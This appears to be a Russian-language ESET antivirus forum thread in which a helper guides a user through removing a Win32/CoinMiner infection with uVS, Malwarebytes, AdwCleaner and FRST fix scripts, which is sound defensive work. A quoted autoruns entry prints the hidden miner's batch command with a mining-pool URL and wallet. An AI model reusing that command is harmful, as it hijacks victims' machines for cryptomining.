delref Y:\DRIVERS\INFTOREG\INFTOREG.EXE
delref Y:\DRIVERS\MONITORINFOVIEW\MONITORINFOVIEW.EXE
delref Y:\DRIVERS\UNKNOWNDI\UNKNOWNDI.EXE
delref Y:\DRIVERS\UNKNOWNDEVICES\UNKNOWNDEVICES.EXE
delref Y:\DRIVERS\HWID\HWID.EXE
delref Y:\FILEMANAGER\Q-DIR\Q-DIR.EXE
delref Y:\FILEMANAGER\TERACOPY\TERACOPY.EXE
delref Y:\FILEMANAGER\XPLORER2\XPLORER2.EXE
delref Y:\INTERNET\ADMUNCHER\ADMUNCHER.EXE
delref Y:\UTILITES\EVERYTHING\EVERYTHING.EXE
delref Y:\NETWORK\NETSETMAN\NETSETMAN.EXE
delref Y:\INTERNET\OPERA\OPERA.EXE
delref Y:\INTERNET\QTWEB\QTWEB.EXE
delref Y:\REMOTE\RADMINC\RADMIN.EXE
delref Y:\INTERNET\SKYPE\START.EXE
delref Y:\FILEMANAGER\TOTALCMD\TC.EXE
delref Y:\EDITORS\ADITOR\ADITOR.EXE
delref Y:\EDITORS\AKELPAD\AKELPAD.EXE
delref Y:\EDITORS\ATLANTIS\ATLANTIS.EXE
delref Y:\EDITORS\DBFPLUS\DBFPLUS.EXE
delref Y:\EDITORS\CDBFW\CDBFW.EXE
delref Y:\EDITORS\FLEXHEX\FLEXHEX.EXE
delref Y:\EDITORS\HEXPROBE\HEXPROBE.EXE
delref Y:\EDITORS\HXD\HXD.EXE
delref Y:\EDITORS\NOTEPAD2\NOTEPAD2.EXE
delref Y:\EDITORS\NOTEPAD++\NOTEPAD++.EXE
delref Y:\EDITORS\SMOFFICE2012\PLANMAKER.EXE
delref Y:\EDITORS\SPREAD\SPREAD32.EXE
delref Y:\EDITORS\SMOFFICE2012\TEXTMAKER.EXE
delref Y:\EDITORS\UEDIT\UEDIT.EXE
delref Y:\EDITORS\WINHEX\WINHEX.EXE
delref Y:\EDITORS\TCODE\TCODE.EXE
delref Y:\REGISTRY\REGTRACERA\ART.EXE
delref %Sys32%\RUNSCANNER.EXE
delref Y:\REGISTRY\FW-REGREPAIR\FW-REGREPAIR.EXE
delref Y:\REGISTRY\INF2REG\SHADRACH-INF2REG2HIV.EXE
delref Y:\REGISTRY\REGSCANNER\JUMPREG.EXE
delref Y:\REGISTRY\REGORGANIZER\REGORGANIZER.EXE
delref Y:\REGISTRY\REG2WBS\REG2WBS.EXE
delref Y:\REGISTRY\REGALYZER\REGALYZER.EXE
delref Y:\REGISTRY\REGCONVERTPE\REGCPE.EXE
delref Y:\REGISTRY\REGEDITPE\REGEDITPE.EXE
delref %Sys32%\HIDCON.EXE
delref Y:\REGISTRY\REGFROMAPP\REGFROMAPP.EXE
delref Y:\REGISTRY\R-REGISTRYMANAGER\R-REGISTRYMANAGER.EXE
delref Y:\REGISTRY\REGISTRYRESTORE\REGRESWIZ.EXE
delref Y:\REGISTRY\REGSHOTUNI\REGSHOT.EXE
delref Y:\REGISTRY\REGSHOT\REGSHOT.EXE
delref Y:\REGISTRY\REGTOSCRIPT\REGTOSCRIPT.EXE
delref Y:\REGISTRY\REGWORKS\REGWORKS.EXE
delref Y:\REGISTRY\REGWORKSHOP\REGWORKSHOP.EXE
delref Y:\REGISTRY\REHIVE\REHIVE.EXE
delref Y:\REGISTRY\SYSTRACER\SYSTRACER.EXE
delref Y:\REGISTRY\W-REGISTRYCLEANER\W-REGISTRYCLEANER.EXE
delref Y:\INTERNET\HTTPFS\HTTPFS.EXE
delref Y:\INTERNET\ISENDSMS\ISENDSMS.EXE
delref Y:\INTERNET\RNQ\RNQ.EXE
delref Y:\INTERNET\UTORRENT\UTORRENT.EXE
delref Y:\INTERNET\VIRUSTOTALUPLOAD\VT-UPLOADER.EXE
delref Y:\INTERNET\OPERA\OPERA.CMD
delref Y:\INTERNET\QTWEB\QTWEB.CMD
delref Y:\REMOTE\AEROADMIN\AEROADMIN.EXE
delref Y:\REMOTE\AMMYY\AMMYY.EXE
delref Y:\REMOTE\MSTSC\MSTSC.EXE
delref Y:\REMOTE\TEAMVIEWER\TEAM_VIEWER.EXE
delref Y:\REMOTE\TEAMVIEWER9\TEAMVIEWER9.EXE
delref Y:\REMOTE\TIGHTVNC\TVNSERVER.EXE
delref Y:\REMOTE\TIGHTVNC\TVNVIEWER.EXE
delref Y:\REMOTE\VNCVIEWER\VNCVIEWER.EXE
delref Y:\NETWORK\IP-ADDRESSCALCULATOR\IP-ADDRESSCALCULATOR.EXE
delref Y:\NETWORK\PORTSCANNER\PORTSCANNER.EXE
delref Y:\NETWORK\ETOOLZ\ETOOLZ.EXE
delref Y:\NETWORK\HOVERIP\HOVERIP.EXE
delref Y:\NETWORK\INETOPS\INETOPS.EXE
delref Y:\NETWORK\LANCALCULATOR\LANCALCULATOR.EXE
delref Y:\NETWORK\LAN-SCANNER\LAN-SCANNER.EXE
delref Y:\NETWORK\MYLANVIEWER\MYLANVIEWER.EXE
delref Y:\NETWORK\NETSHAREMONITOR\NETSHAREMONITOR.EXE
delref Y:\NETWORK\PUTTY\PUTTY.EXE
delref Y:\NETWORK\TCPVIEW\TCPVIEW.EXE
delref Y:\NETWORK\WIRELESSNETVIEW\WIRELESSNETVIEW.EXE
delref Y:\SYSTEM\BLUESCREENVIEW\BLUESCREENVIEW.EXE
delref Y:\SYSTEM\CURRENTPROCESS\CPROCESS.EXE
delref Y:\SYSTEM\DEPENDS\DEPENDS.EXE
delref Y:\SYSTEM\ERD-2005\EXPLORER.EXE
delref Y:\SYSTEM\ERRORLOOKUP\ERRORLOOKUP.EXE
delref Y:\SYSTEM\HASHTAB\HASHTAB32_S.EXE
delref Y:\SYSTEM\JV16-POWERTOOLS\JV16-POWERTOOLS.EXE
delref Y:\SYSTEM\LOCKHUNTER\LOCKHUNTER.EXE
delref Y:\SYSTEM\MYUNINSTALLER\MYUNINST.EXE
delref Y:\SYSTEM\NTFSACCESS\NTFSACCESS.EXE
delref Y:\SYSTEM\OPENEDFILESVIEW\OPENEDFILESVIEW.EXE
delref Y:\SYSTEM\PROCESSACTIVITYVIEW\PROCESSACTIVITYVIEW.EXE
delref Y:\SYSTEM\PROCESSEXPLORER\PROCESSEXPLORER.EXE
delref Y:\SYSTEM\PROCESSHACKER\PROCESSHACKER.EXE
delref Y:\SYSTEM\PSERVICES\PSERV2.EXE
delref Y:\SYSTEM\YANDEXPUNTO\PUNTO.EXE
delref Y:\DRIVERS\SERVIWIN\SERVIWIN.EXE
delref Y:\SYSTEM\SHELLEXVIEW\SHEXVIEW.EXE
delref Y:\SYSTEM\SYSTEMEXPLORER\SYSTEMEXPLORER.EXE
delref Y:\SYSTEM\UNLOCKER\UNLOCKER.EXE
delref Y:\SYSTEM\WINTOOLS.NET\WINTOOLS-NET.EXE
delref Y:\SYSTEM\AUTOREG32\AUTOREG32.EXE
delref Y:\SYSTEM\ANTIAUTORUN\ANTIAUTORUN.EXE
delref Y:\SYSTEM\AUTORUNS\AUTORUNS.EXE
delref Y:\SYSTEM\CS-STARTER\CS-STARTER.EXE
delref Y:\SYSTEM\PRODUCTKEYEXPLORER\PRODUCTKEYEXPLORER.EXE
delref Y:\SYSTEM\MPR\MPR.EXE
delref Y:\SYSTEM\PRODUKEY\PRODUKEY.EXE
delref Y:\SYSTEM\RECALL\RECALL.EXE
delref Y:\SYSTEM\RECOVERKEYS\RECOVERKEYS.EXE
delref Y:\SYSTEM\CCLEANER\CCLEANER.EXE
delref Y:\SYSTEM\DISKCLEANER\DCLEANER.EXE
delref Y:\SYSTEM\FCLEANER\FCLEANER.EXE
delref Y:\SYSTEM\W-DISKCLEANER\WISEDISKCLEANER.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\PASSWORDCHANGER.EXE
delref Y:\PASSWORD\AFUWIN\AFUWIN.EXE
delref Y:\PASSWORD\CMOSDEANIMATOR\CMOSDEANIMATOR.EXE
delref Y:\PASSWORD\DREAMPACK\DREAMPACK.EXE
delref Y:\PASSWORD\ESR\ESR.EXE
delref Y:\PASSWORD\NTPWEDIT\NTPWEDIT.EXE
delref Y:\PASSWORD\PASSWDRENEW\PASSWDRENEW.EXE
delref Y:\PASSWORD\PASSRESET\PASSRESET.EXE
delref Y:\PASSWORD\RECOVERPASSWORDS\RECOVERPASSWORDS.EXE
delref Y:\PASSWORD\SAMINSIDE\SAMINSIDE.EXE
delref Y:\PASSWORD\WINDOWSGATE\WINDOWSGATE.EXE
delref Y:\PASSWORD\BIOS-MASTERPG\BIOS-MASTERPG.EXE
delref Y:\PASSWORD\CMOSMANAGER\CMOS.EXE
delref Y:\SYSTEM\FREEOTFE\FREEOTFE.EXE
delref Y:\SYSTEM\OMZIFF\OMZIFF.EXE
delref Y:\SYSTEM\TRUECRYPT\TRUECRYPT.EXE
delref Y:\TEST\AIDA64\AIDA64.EXE
delref Y:\TEST\ASTRA32\ASTRA32.EXE
delref Y:\TEST\BEPRO230\BEPRO.EXE
delref Y:\TEST\BATTERYMON\BATTERYMON.EXE
delref Y:\TEST\SNM\SNM.EXE
delref Y:\TEST\CPU-Z\CPUZ.EXE
delref Y:\TEST\CPUBURN-IN\CPUBURN-IN.EXE
delref Y:\TEST\HWMONITOR\HWMONITOR.EXE
delref Y:\TEST\CRYSTALMARK\CRYSTALMARK.EXE
delref Y:\TEST\DISKCHECK\DISKCHECK.EXE
delref Y:\TEST\DISKMARK\DISKMARK.EXE
delref Y:\TEST\DISPLAYX\DISPLAYX.EXE
delref Y:\TEST\HD-SPEED\HD_SPEED.EXE
delref Y:\TEST\HWINFO32\HWINFO32.EXE
delref Y:\TEST\KEYBOARDTEST\KEYBOARDTEST.EXE
delref Y:\TEST\LINX\LINX.EXE
delref Y:\TEST\MEMTEST\MEMTEST.EXE
delref Y:\TEST\RAMMON\RAMMON.EXE
delref Y:\TEST\RAMTESTER\RT.EXE
delref Y:\TEST\RMMA\RMMA.EXE
delref Y:\TEST\SECURABLE\SECURABLE.EXE
delref Y:\TEST\SIW\SIW.EXE
delref Y:\TEST\SIV\SIV.EXE
delref Y:\TEST\TFTTEST\TFTTEST.EXE
delref Y:\TEST\TFTTEST\TTFTTEST.EXE
delref Y:\TEST\EIZOTEST\EIZOTEST.EXE
delref Y:\SYSTEM\WINSETUP2K10\WINSETUP2K10.EXE
delref Y:\SYSTEM\78SETUP.CMD
delref Y:\SYSTEM\ANTIWPA\WPA-KILL.EXE
delref Y:\SYSTEM\NT5INSTALLER\NT5INSTALLER.EXE
delref Y:\SYSTEM\NT6FAST\NT6FAST.EXE
delref Y:\RECOVERY\SGI\SGI.EXE
delref Y:\SYSTEM\WINNTSETUP\WINNTSETUP.EXE
delref Y:\SYSTEM\WINNTSETUP\WINNTSETUP3.CMD
delref Y:\UTILITES\ANTRENAMER\ANTRENAMER.EXE
delref Y:\UTILITES\AUTOIT2EXE\AUT2EXE.EXE
delref Y:\UTILITES\AUTOREN\AUTOREN.EXE
delref Y:\UTILITES\BCOMPARE\BCOMPARE.EXE
delref Y:\UTILITES\CLONESPY\CLONESPY.EXE
delref Y:\UTILITES\DIRECTORYLP\DIRECTORYLP.EXE
delref Y:\UTILITES\DOSBOX\DOSBOX.EXE
delref Y:\UTILITES\FILELOCATOR\FILELOCATOR.EXE
delref Y:\UTILITES\FILEALYZER\FILEALYZER.EXE
delref Y:\UTILITES\FILECOMPARE\FILECOMPARE.EXE
delref Y:\UTILITES\FREEFILESYNC\FREEFILESYNC.EXE
delref Y:\UTILITES\HDDSCANNER\SCANNER.EXE
delref Y:\UTILITES\IMAGEGREATOR\WIMIC.EXE
delref Y:\UTILITES\IMGDISK\IMGDSK.EXE
delref Y:\UTILITES\MOUSEEMU\MOUSEMU.EXE
delref Y:\UTILITES\PEEDITOR\PEDITOR.EXE
delref Y:\UTILITES\PEXPLORER\PEXPLORER.EXE
delref Y:\UTILITES\PRINTFOLDER\PRINTFOLDER.EXE
delref Y:\UTILITES\QUICKBFC\QUICKBFC.EXE
delref Y:\UTILITES\RESHACKER\RESHACKER.EXE
delref Y:\UTILITES\RESOURCEBINDER\RESBINDER.EXE
delref Y:\UTILITES\RESTORATOR\RESTORATOR.EXE
delref Y:\UTILITES\RENAME-IT\RNAME-IT.EXE
delref Y:\UTILITES\SCROLLMOUSE\SCROLLMOUSE.EXE
delref Y:\UTILITES\SEARCH&REPLACE\SNR.EXE
delref Y:\UTILITES\SEARCHMYFILES\SEARCHMYFILES.EXE
delref Y:\UTILITES\SIMPLEEYE\SIMPLEEYE.EXE
delref Y:\UTILITES\TOUCAN\TOUCAN.EXE
delref Y:\UTILITES\UVSCREENCAMERA\UVSCREENCAMERA.EXE
delref Y:\UTILITES\VIRTUAL-FDD\VIRTUAL-FDD.EXE
delref Y:\UTILITES\TWEAKER\TWEAKER.EXE
delref Y:\UTILITES\VISTAUACMAKER\VISTAUACMAKER.EXE
delref Y:\UTILITES\WINDIRSTAT\WINDIRSTAT.EXE
delref Y:\UTILITES\KALKULES\KALKULES.EXE
delref Y:\UTILITES\THECALC\THECALC.EXE
delref Y:\UTILITES\MEASURE\MEASURE.EXE
delref Y:\UTILITES\ONSCREENKEYBOARD\OSK.EXE
delref %SystemRoot%\INSTALLER\{127F620C-AFB1-43CD-84D5-C51DAC99EF7F}\MICROINVESTUTILITY_45B7A774D53546E793C167AD687E88A4.EXE
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

[ Как создать образ автозапуска? ]

Сообщений: 12

Баллов: 6

Регистрация: 21.04.2015

Размещено 18.01.2018 09:36:32

Сделал, по ощущениям загрузка стала быстрее. Прогнал сканирование НОД32, вылезла куча сообщений, журнал угроз прилагаю
После этого сделал сканирование малваребайт - прилагаю журнал

Прикрепленные файлы

угрозы.txt (14.72 КБ)
малваребайт.txt (569.66 КБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 18.01.2018 09:46:30

2.удалите все найденное в малваребайт
перегрузите систему
далее,
3.сделайте проверку в АдвКлинере
http://forum.esetnod32.ru/forum9/topic7084/

*****
4.в АдвКлинере, после завершения проверки,
в секции Папки снимите галки с записей mail.ru, yandex (если есть такие)
остальное удалите по кнопке Очистить
далее,

5.сделайте проверку в FRST
http://forum.esetnod32.ru/forum9/topic2798/

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 18.01.2018 09:51:21

да, вот этот батник запускается.

Цитата
Полное имя C:\WINDOWS\SYSTEM32\NVVSNC.BAT Имя файла NVVSNC.BAT Тек. статус [Запускался неявно или вручную] Сохраненная информация на момент создания образа Статус [Запускался неявно или вручную] Размер 165 байт Создан 16.01.2018 в 13:12:06 Изменен 16.01.2018 в 13:13:13 Цифр. подпись Отсутствует либо ее не удалось проверить Доп. информация на момент обновления списка SHA1 3E4B0D485E4F20FD753A2161B52DEDE75852F9B5 MD5 BA3C9D1A2C75822F57677AF85DFF114F #FILE# nvvsnc.exe -c x -M stratum+tcp://43zxYszW2D4FTVjwgGfKspHfa5t2tBkvf7b3PGJ443mrcdEgRQPL5vxRbEW6jV3JzeQB27BMvyaPyia2vfwLDQaGDznpR5H:[email protected]:5555:1111/xmr Ссылки на объект Prefetcher C:\WINDOWS\Prefetch\Layout.ini

Цитата

Полное имя C:\WINDOWS\SYSTEM32\NVVSNC.BAT
Имя файла NVVSNC.BAT
Тек. статус [Запускался неявно или вручную]

Сохраненная информация на момент создания образа
Статус [Запускался неявно или вручную]
Размер 165 байт
Создан 16.01.2018 в 13:12:06
Изменен 16.01.2018 в 13:13:13
Цифр. подпись Отсутствует либо ее не удалось проверить

Доп. информация на момент обновления списка
SHA1 3E4B0D485E4F20FD753A2161B52DEDE75852F9B5
MD5 BA3C9D1A2C75822F57677AF85DFF114F

#FILE# nvvsnc.exe -c x -M stratum+tcp://43zxYszW2D4FTVjwgGfKspHfa5t2tBkvf7b3PGJ443mrcdEgRQPL5vxRbEW6jV3JzeQB27BMvyaPyia2vfwLDQaGDznpR5H:[email protected]:5555:1111/xmr

Ссылки на объект
Prefetcher C:\WINDOWS\Prefetch\Layout.ini

[ Как создать образ автозапуска? ]

Сообщений: 12

Баллов: 6

Регистрация: 21.04.2015

Размещено 18.01.2018 23:22:00

Цитата
santy написал: да, вот этот батник запускается.

Я его удаляю а какая-то тварь его опять создает , и update.exe и прочую гадость
Все рекомендации выполнил,логи прилагаю. Что еще можно сделать?

Прикрепленные файлы

FRST.txt (53.9 КБ)
Addition.txt (74.95 КБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 19.01.2018 01:58:39

6. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

Код
AlternateDataStreams: C:\Users\Администратор\Local Settings:wa [146] AlternateDataStreams: C:\Users\Администратор\AppData\Local:wa [146] AlternateDataStreams: C:\Users\Администратор\AppData\Local\Application Data:wa [146] AlternateDataStreams: C:\Users\Все пользователи\TEMP:10D14739 [225] AlternateDataStreams: C:\Users\Все пользователи\TEMP:472FBBAF [143] GroupPolicy: Restriction ? <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION FF Extension: (Kinogo.NET) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\c36d703be1d6dc1794a64fbb1e28665b@c36d703be1d6dc1794a64fbb1e28665b.com.xpi [2016-06-09] [Legacy] FF Extension: (anticenz) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\[email protected] [2016-08-06] [Legacy] FF Extension: (Рамблер-Ассистент) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\[email protected] [2015-08-17] [Legacy] FF Extension: (Disable JavaScript Shared Memory) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\features\{e50f5528-fde2-4040-98a3-08ed578189f4}\[email protected] [2018-01-10] [Legacy] 2018-01-16 13:12 - 2018-01-18 09:08 - 000000165 _____ C:\Windows\system32\nvvsnc.bat EmptyTemp: Reboot:

Код

AlternateDataStreams: C:\Users\Администратор\Local Settings:wa [146]
AlternateDataStreams: C:\Users\Администратор\AppData\Local:wa [146]
AlternateDataStreams: C:\Users\Администратор\AppData\Local\Application Data:wa [146]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:10D14739 [225]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:472FBBAF [143]
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
FF Extension: (Kinogo.NET) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\c36d703be1d6dc1794a64fbb1e28665b@c36d703be1d6dc1794a64fbb1e28665b.com.xpi [2016-06-09] [Legacy]
FF Extension: (anticenz) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\[email protected] [2016-08-06] [Legacy]
FF Extension: (Рамблер-Ассистент) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\Extensions\[email protected] [2015-08-17] [Legacy]
FF Extension: (Disable JavaScript Shared Memory) - C:\Users\Администратор\AppData\Roaming\Mozilla\Firefox\Profiles\qhuhggft.default-1439445174235\features\{e50f5528-fde2-4040-98a3-08ed578189f4}\[email protected] [2018-01-10] [Legacy]
2018-01-16 13:12 - 2018-01-18 09:08 - 000000165 _____ C:\Windows\system32\nvvsnc.bat
EmptyTemp:
Reboot:

+
включите брэндмауэр, если он у вас выключен.

[ Как создать образ автозапуска? ]

Сообщений: 12

Баллов: 6

Регистрация: 21.04.2015

Размещено 19.01.2018 22:09:23

Все сделал, лог прилагаю.
Сегодня батник не появлялся
понаблюдаю на выходных

Прикрепленные файлы

Fixlog.txt (4.31 КБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 20.01.2018 02:00:05

Цитата
Евгений Шелепков написал: Все сделал, лог прилагаю.Сегодня батник не появлялсяпонаблюдаю на выходных

+
выполните наши рекомендации по безопасной работе в сети.
https://forum.esetnod32.ru/forum9/topic13764//

[ Как создать образ автозапуска? ]

Сообщений: 12

Баллов: 6

Регистрация: 21.04.2015

Размещено 20.01.2018 16:30:26

Зараза больше не появлялась. Рекомендации выполнил.
Считаю что результат достигнут. Большое спасибо!

[ Закрыто ] NOD32 постоянно ловит Win32/CoinMiner